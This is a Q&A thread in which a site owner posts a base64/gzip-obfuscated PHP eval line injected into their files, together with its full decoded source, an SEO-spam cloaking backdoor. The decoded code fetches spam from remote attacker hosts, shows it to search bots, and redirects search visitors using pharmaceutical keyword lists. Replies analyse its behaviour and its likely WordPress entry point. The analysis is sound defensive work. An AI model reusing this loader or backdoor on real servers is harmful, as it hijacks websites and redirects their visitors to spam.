# Evil PHP code I need help analyzing

Tags: php

I found on my server something like this at the beginning of my php files:

```
<?php eval(gzinflate(base64_decode('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')));?>
```

After decoding I got:

```
if (!defined('frmDs')){
    define('frmDs' ,1);
    error_reporting(0);

    function frm_dl ($url) {
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $out = curl_exec ($ch);
            if (curl_errno($ch) !== 0) $out = false;
            curl_close ($ch);
        } else {$out = @file_get_contents($url);}
        return trim($out);
    }

    function frm_crpt($in){
        $il=strlen($in);$o='';
        for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
        return $o;
    }

    function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
        $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
        $fe = file_exists($f);
        if(!$fe || time() - filemtime($f) > 60 * $cmtime)
        {
            $dlc=frm_dl($link);
            if($fe && $dlc===false) 
                @touch($f);
            else
            {
                if($fe && empty($dlc) && $toe) 
                {
                    @touch($f);
                }
                else
                {
                    if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
                    else{return $dlc;}
                }
            }
        }
        $fc = @file_get_contents($f);
        return ($fc)?frm_crpt($fc):'';
    }

    function frm_isbot(){
        $ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
        if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 
        $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
                    array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
                    array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
        foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
        if(!$ua)return true;
        $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
        foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
        $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
        $hba=array('google','msn','yahoo');
        if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
        return false;
    }

    function frm_tmpdir(){
        $fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
            if ($t = getenv($v)) {$fs[]=$t;}
        }
        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
        $fs[]='.';

        foreach ($fs as $f){
            $tf = $f.'/'.md5(rand());
            if($fp = @fopen($tf, 'w')){
                fclose($fp);
                unlink($tf);
                return $f;
            }
        }
        return false;
    }

    function frm_seref(){
        $r = @strtolower($_SERVER["HTTP_REFERER"]);
        $ses = array('google','bing','yahoo','ask','aol');
        foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
        return false;
    }

    function frm_havekey($s=false){
        $nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
        $k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
        if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
        foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
        return '';
    }

    function frm_strtonum($Str, $Check, $Magic) {
        $Int32Unit = 4294967296;
        $length = strlen($Str);
        for ($i = 0; $i < $length; $i++) {
            $Check *= $Magic;
            if ($Check >= $Int32Unit) {
                $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
                $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
            }
            $Check += ord($Str{$i});
        }
        return $Check;
    }

    function frm_chhash($String) {
        $Check1 =frm_strtonum($String, 0x1505, 0x21);
        $Check2 = frm_strtonum($String, 0, 0x1003F);
        $Check1 >>= 2;
        $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
        $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
        $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
        $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
        $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
        $Hashnum = ($T1 | $T2);
        $CheckByte = 0;
        $Flag = 0;
        $HashStr = sprintf('%u', $Hashnum) ;
        $length = strlen($HashStr);
        for ($i = $length - 1;  $i >= 0;  $i --) {
            $Re = $HashStr{$i};
            if (1 === ($Flag % 2)) {
                $Re += $Re;
                $Re = (int)($Re / 10) + ($Re % 10);
            }
            $CheckByte += $Re;
            $Flag ++;
        }
        $CheckByte %= 10;
        if (0 !== $CheckByte) {
            $CheckByte = 10 - $CheckByte;
            if (1 === ($Flag % 2) ) {
                if (1 === ($CheckByte % 2)) {
                    $CheckByte += 9;
                }
                $CheckByte >>= 1;
            }
        }
        return '7'.$CheckByte.$HashStr;
    }

    function frm_chpr($url,$td){
        $ch=frm_chhash($url);
        $res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
        if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
    }

    function frm_red($k){
        if(!frm_isbot() && frm_seref()){
            $r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
            $s=@urlencode($_SERVER['HTTP_REFERER']);
            die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
        }
    }

    $tdir = frm_tmpdir();
    $isb=frm_isbot();
    $k=frm_havekey();
    $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
    if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
    if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
        $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
        $sp = "http://yoxvjkygff.rr.nu/stat/feed.php?pa=$parg&h=$host";
        //
        $tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
        if($isb && ($ppr = frm_chpr($tp)) > 1){
            $pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
            if($pc) die($pc);
        }
        //
        $ruri = strtolower($_SERVER['REQUEST_URI']);
        $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
        if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
            frm_red($k);
            die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
        }   
        if (($ruri=='/' || $ruri=='/index.php') && $isb) {
            $c=frm_getcache($tdir, $sp ,60*24);
            if($c)die($c);
        }
        //
        if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
            if(strpos($sdl, '|'.$ruri.'|') !== false){
                frm_red($k);
                die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
            }
        }
    }
    if($k) frm_red($k);
}
```

Can you guys help me and tell me what usefull info I can get out of it?

Answer (score 3):

I have actually seen this little bit of code (or something very similar) infecting a system before.  At a high level this code tries to watch for traffic which meets certain criteria (Bot stats, source, keywords in request, etc.) and dumps what can only be described as something between a black hat SEO list of keywords and an advertisement onto the top of your page.  It also uses a caching system where it tries stores the rendered templates with the prefix "sess_".  If you find a directory it has write permissions in, you should see a bunch of those fills which will be interesting to review.

While it needs to be cleaned and the attack vector patched up, its not the most malicious bit of code as it is now.  The trouble is, once it is in place, nothing is stopping it for executing other types of code which could cause more trouble.

Comment: Thanks! Is there anything in that code that can suggest an attack vector? I'm trying right now to patch everything I have on that server, but it would be still nice to know.

Comment: The last time I saw this it was on a shared hosting platform and we suspected one of the WordPress sites was the source, likely something that wasn't patched in a while.  We never were sure because the server wasn't very well jailed and a few sites got infected out of hundreds.  I would start there, especially because it seems to be looking for WordPress assets.  For instance, it tries to write to:  '/tmp', '/var/tmp', './wp-content/cache', './wp-content/uploads', './tmp', './cache', './images', two of which are specifically wp folders.